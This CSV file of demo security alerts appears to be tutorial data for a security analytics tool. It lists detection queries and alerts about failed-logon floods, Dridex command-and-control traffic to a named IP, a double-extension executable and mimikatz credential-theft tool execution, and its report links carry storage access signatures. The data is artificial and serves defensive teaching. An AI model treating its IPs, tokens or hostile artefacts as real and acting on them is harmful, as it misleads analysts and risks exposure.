Path: blob/master/tutorials-and-examples/feature-tutorials/data/alertlist.csv
3255 views
,TenantId,StartTimeUtc,EndTimeUtc,ProviderAlertId,SystemAlertId,ProviderName,VendorName,AlertType,AlertName,AlertDisplayName,Description,Severity,IsIncident,ExtendedProperties,Entities,ConfidenceLevel,ConfidenceScore,ExtendedLinks,WorkspaceSubscriptionId,WorkspaceResourceGroup,TimeGenerated,ResourceId,SourceComputerId,CompromisedEntity
0,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-11 06:31:40,2019-01-12 06:31:40,e0c9484b-ad5f-4161-b73b-388676c05818,047f47d6-79b7-4502-824b-97abc4905a73,CustomAlertRule,Alert Rule,DC local group addition - Demo,DC local group addition - Demo,DC local group addition - Demo,Domain controllers local group addition,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-12T06%3A31%3A40.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""23034"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""800"",
""Total Account Entities"": ""1563"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""75.10.91.22"",
""Type"": ""ip"",
""Count"": 23034
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 23034
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 5909
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 878
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 486
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-12 06:41:44,,,
1,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-11 06:31:42,2019-01-12 06:31:42,8095ce01-1a2f-4973-95bb-bb46ee6c8016,2d06cb42-bdff-426d-8091-ccc151bcbc94,CustomAlertRule,Alert Rule,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Plao Alto admin logged on via SSH - Demo,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-12T06%3A31%3A42.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""23035"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""2000"",
""Total Account Entities"": ""1563"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""92.52.10.25"",
""Type"": ""ip"",
""Count"": 23035
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 23035
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 5909
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 878
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 486
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-12 06:41:47,,,
2,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-11 06:33:55,2019-01-12 06:33:55,49828d69-d59e-4c47-80c2-8d62203bbd87,412ca580-63c8-4fd2-87e4-87b1ba4260b3,CustomAlertRule,Alert Rule,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,Domain controllers with Microsoft antimalware core engine failure,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-12T06%3A33%3A55.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""23036"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-12 06:43:59,,,
3,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-11 19:18:10,2019-01-11 20:18:10,bf604b0c-073d-4f94-a73e-fd99ac8364ea,42a8b425-1c41-4355-8343-18ad563c43b6,CustomAlertRule,Alert Rule,Suspicious Account Added,Suspicious Account Added,Suspicious Account Added,Account added and removed from group within 24h,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""timeInterval\"":{\""intervalDuration\"":3600,\""intervalEnd\"":\""2019-01-11T20%3A18%3A10.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""1"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""60"",
""Suppression in Minutes"": ""720""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-11 20:28:14,,,
4,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-10 05:38:06,2019-01-11 05:38:06,8c6c4eb9-dbd8-4484-b317-54d7d766f87b,401f2680-cc05-4e6f-a1f6-69cff2055cd9,CustomAlertRule,Alert Rule,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trus was created on Active Directory,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-11T05%3A38%3A06.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""14285"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""1000"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1"",
""Total Account Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""23.54.94.45"",
""Type"": ""ip"",
""Count"": 14285
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 14285
},
{
""$id"": ""5"",
""Name"": ""brians"",
""UPNSuffix"": ""ContosoSI.onmicrosoft.com"",
""IsDomainJoined"": true,
""Type"": ""account"",
""Count"": 14285
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-11 05:48:11,,,
5,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-10 06:25:57,2019-01-11 06:25:57,d950c52d-fcaf-43f4-b68b-2d3fea13b417,b5786d68-7f5e-4be1-92e6-e255010d1d8c,CustomAlertRule,Alert Rule,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication was identified based on TI,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-11T06%3A25%3A57.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""14596"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0"",
""Total Account Entities"": ""2018"",
""Total Host Entities"": ""1"",
""Total IP Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""80.10.26.89"",
""Type"": ""ip"",
""Count"": 14596
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 14596
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 6695
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 662
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 185
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-11 06:36:03,,,
6,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-10 06:31:40,2019-01-11 06:31:40,8a3d199d-ff45-4620-aad9-95c2a354fcd1,01659bf1-1228-4e46-b73b-e7d173d365eb,CustomAlertRule,Alert Rule,DC local group addition - Demo,DC local group addition - Demo,DC local group addition - Demo,Domain controllers local group addition,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-11T06%3A31%3A40.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""14632"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""800"",
""Total Account Entities"": ""2023"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""75.10.91.22"",
""Type"": ""ip"",
""Count"": 14632
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 14632
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 6725
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 662
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 184
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-11 06:41:44,,,
7,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-10 06:31:42,2019-01-11 06:31:42,39dff905-8e4d-48bc-b028-60a12a02ae62,0ce6ad61-302a-4142-8eaa-4da9dfad9ca9,CustomAlertRule,Alert Rule,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Plao Alto admin logged on via SSH - Demo,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-11T06%3A31%3A42.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""14632"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""2000"",
""Total Account Entities"": ""2023"",
""Total Host Entities"": ""1"",
""Total IP Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""92.52.10.25"",
""Type"": ""ip"",
""Count"": 14632
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 14632
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 6725
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 662
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 184
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-11 06:41:47,,,
8,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-10 06:33:55,2019-01-11 06:33:55,55e93ac7-ee7d-4fd7-ae7b-d64ef41df393,df9f92cb-6fd2-469b-9b72-28f128df1adf,CustomAlertRule,Alert Rule,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,Domain controllers with Microsoft antimalware core engine failure,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-11T06%3A33%3A55.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""14654"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-11 06:43:58,,,
9,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-06 05:02:00,2019-01-06 05:02:00,f6291e49-c290-4cd6-8188-abef044198d6,98a6dea6-1b64-41d0-938e-0dec24b234ec,InternalDemo,Microsoft,Network communication with a malicious machine detected,Network communication with a malicious machine detected,Network communication with a malicious machine detected,Network traffic analysis indicates that your machine (IP 1.2.3.4) has communicated with what is possibly a Command and Control center for a malware of type Dridex at IP 183.95.154.13. Dridex is a banking trojan family that steals credentials of online banking websites. Dridex is typically distributed via phishing emails with Microsoft Word and Excel document attachments. These Office documents contain malicious macro code that downloads and installs Dridex on the affected system.,Medium,False,"{
""Attacker Port"": ""80"",
""Attacker IP"": ""183.95.154.13"",
""Victim Port"": ""15421"",
""Victim IP"": ""1.2.3.4"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm1"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1"",
""Type"": ""host""
},
{
""$id"": ""5"",
""Address"": ""183.95.154.13"",
""Location"": {
""CountryCode"": ""CN"",
""CountryName"": ""China"",
""State"": ""Hubei"",
""City"": ""Wuhan"",
""Longitude"": 114.28946,
""Latitude"": 30.55397,
""Asn"": 4837
},
""Type"": ""ip""
}
]",Unknown,,"[
{
""Href"": ""https://prodtasstorageaccount.blob.core.windows.net/reports/MSTI-TS-Malicious-Macros.pdf?sv=2015-07-08&sig=i%2FYVXil2FPsH3Kn4i3jH1uNPC5r9QyYW6wKCc7WJtng%3D&spr=https&se=2017-11-14T13%3A50%3A35Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: Malicious Macros"",
""Type"": ""webLink""
},
{
""Href"": ""https://prodtasstorageaccount.blob.core.windows.net/reports/MSTI-TS-Trojan-Downloader-Macros.pdf?sv=2015-07-08&sig=i%2FYVXil2FPsH3Kn4i3jH1uNPC5r9QyYW6wKCc7WJtng%3D&spr=https&se=2017-11-14T13%3A50%3A35Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: Trojan Downloader Macros"",
""Type"": ""webLink""
},
{
""Href"": ""https://prodtasstorageaccount.blob.core.windows.net/reports/MSTI-TS-Dridex.pdf?sv=2015-07-08&sig=i%2FYVXil2FPsH3Kn4i3jH1uNPC5r9QyYW6wKCc7WJtng%3D&spr=https&se=2017-11-14T13%3A50%3A35Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: Dridex"",
""Type"": ""webLink""
}
]",,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1,,
10,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-01 00:02:00,2019-01-01 00:02:00,fd948195-6e81-4f50-91d1-7d7d4fb170f7,62ded865-938b-4bb3-afef-605d692607f1,InternalDemo,Microsoft,Possible compromised machine detected,Possible compromised machine detected,Possible compromised machine detected,"Threat intelligence indicates that your machine (at IP 1.2.3.5) may have been compromised by a malware of type AldiBot. AldiBot is an HTTP-controlled denial-of-service bot - it offers HTTP and TCP DDoS capabilities along with Firefox, Pidgin and jDownloader credential theft, the creation of a SOCKS5 proxy on infected machine, and the ability to download and execute malicious code of the attacker’s choice.",Medium,False,"{
""Machine IP"": ""1.2.3.5"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm4"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm4"",
""Type"": ""host""
}
]",Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm4,,
11,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-08 05:02:00,2019-01-08 05:02:00,bf226efc-3d3c-4b93-8af3-943a70984792,28f9b83a-33e6-44da-a002-0f48bff46a67,InternalDemo,Microsoft,Possible outgoing spam activity detected,Possible outgoing spam activity detected,Possible outgoing spam activity detected,"Network traffic analysis detected suspicious outgoing traffic from vm1lin. This traffic may be a result of a spam activity.
If this behavior is intentional, please note that sending spam is against Azure Terms of service. If this behavior is unintentional, it may mean your machine has been compromised.",Low,False,"{
""Compromised Host"": ""vm1lin"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm1lin"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1lin"",
""Type"": ""host""
}
]",Unknown,,"[
{
""Href"": ""https://v7cvxo4erctvostor.blob.core.windows.net/20170814-7/MSTI-TS-SpamBots-Email-Flooders.pdf?sv=2015-12-11&sig=PvE1BuQWWjjroAlRQHN8MHzT4qhXpwW%2Fe%2BMfoHPp9t4%3D&spr=https&se=2017-11-21T07%3A13%3A43Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: Spambots and email flooders"",
""Type"": ""webLink""
}
]",,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1lin,,vm1lin
12,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-03 00:02:00,2019-01-03 00:02:00,5196b3f5-103c-40c2-9783-c7a1f8ce8f34,112dc225-bc2d-4328-97fd-a99e0b000b1f,InternalDemo,Microsoft,Suspicious double extension file executed,Suspicious double extension file executed,Suspicious double extension file executed,Machine logs indicate an execution of a process with a suspicious double extension. This extension may trick users into thinking files are safe to be opened and might indicate the presence of malware on the system.,High,False,"{
""parent process"": ""-"",
""process name"": ""C:\\Documents\\BudgetReport.pdf.exe"",
""command line"": ""C:\\Documents\\BudgetReport.pdf.exe"",
""domain name"": ""Contoso"",
""process id"": ""0xa30"",
""user name"": ""admin"",
""user sid"": ""S-1-5-21-735211308-2936392771-281815312-500"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm3"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3"",
""Type"": ""host""
},
{
""$id"": ""5"",
""Name"": ""admin"",
""NTDomain"": ""contoso"",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": true,
""Type"": ""account""
},
{
""$id"": ""6"",
""Directory"": ""c:\\documents"",
""Name"": ""budgetreport.pdf.exe"",
""Type"": ""file""
},
{
""$id"": ""7"",
""CommandLine"": ""C:\\Documents\\BudgetReport.pdf.exe"",
""ImageFile"": {
""$ref"": ""6""
},
""Account"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
}
]",Unknown,,"[
{
""Href"": ""https://v7cvxo4erctvostor.blob.core.windows.net/20170816-13/MSTI-TS-Suspicious-Double-Extensions.pdf?sv=2015-12-11&sig=%2FA6Npq4Z4OtwuiCRsUijXG4YYegL32sPvWyi49zdez0%3D&spr=https&se=2017-11-23T13%3A00%3A28Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: Suspicious Double Extensions"",
""Type"": ""webLink""
}
]",,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3,,
13,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-03 00:02:00,2019-01-03 00:02:00,31b76dcb-4ddd-4886-a682-589b76b032d9,a32adc3f-43f7-4e5d-b833-98baa71c2f51,InternalDemo,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,Machine logs indicate that the suspicious Process: 'C:\ProgramFiles\mimikatz.exe' was running with the command line: 'C:\ProgramFiles\mimikatz.exe',High,False,"{
""parent process"": ""-"",
""process name"": ""C:\\ProgramFiles\\mimikatz.exe"",
""command line"": ""C:\\ProgramFiles\\mimikatz.exe"",
""domain name"": ""Contoso"",
""process id"": ""0xa30"",
""user name"": ""admin"",
""user sid"": ""S-1-5-21-735211308-2936392771-281815312-500"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm3"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3"",
""Type"": ""host""
},
{
""$id"": ""5"",
""Name"": ""admin"",
""NTDomain"": ""contoso"",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": true,
""Type"": ""account""
},
{
""$id"": ""6"",
""Directory"": ""c:\\programfiles"",
""Name"": ""mimikatz.exe"",
""Type"": ""file""
},
{
""$id"": ""7"",
""CommandLine"": ""C:\\ProgramFiles\\mimikatz.exe"",
""ImageFile"": {
""$ref"": ""6""
},
""Account"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
}
]",Unknown,,"[
{
""Href"": ""https://v7cvxo4erctvostor.blob.core.windows.net/20170816-12/MSTI-TS-Hacker-Tool-Executed.pdf?sv=2015-12-11&sig=zQO96k1RcUqIf4KG85ffMkrj4RjVcOm5F1nQkvjUYXc%3D&spr=https&se=2017-11-23T12%3A58%3A38Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: Hacker tool executed"",
""Type"": ""webLink""
}
]",,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3,,
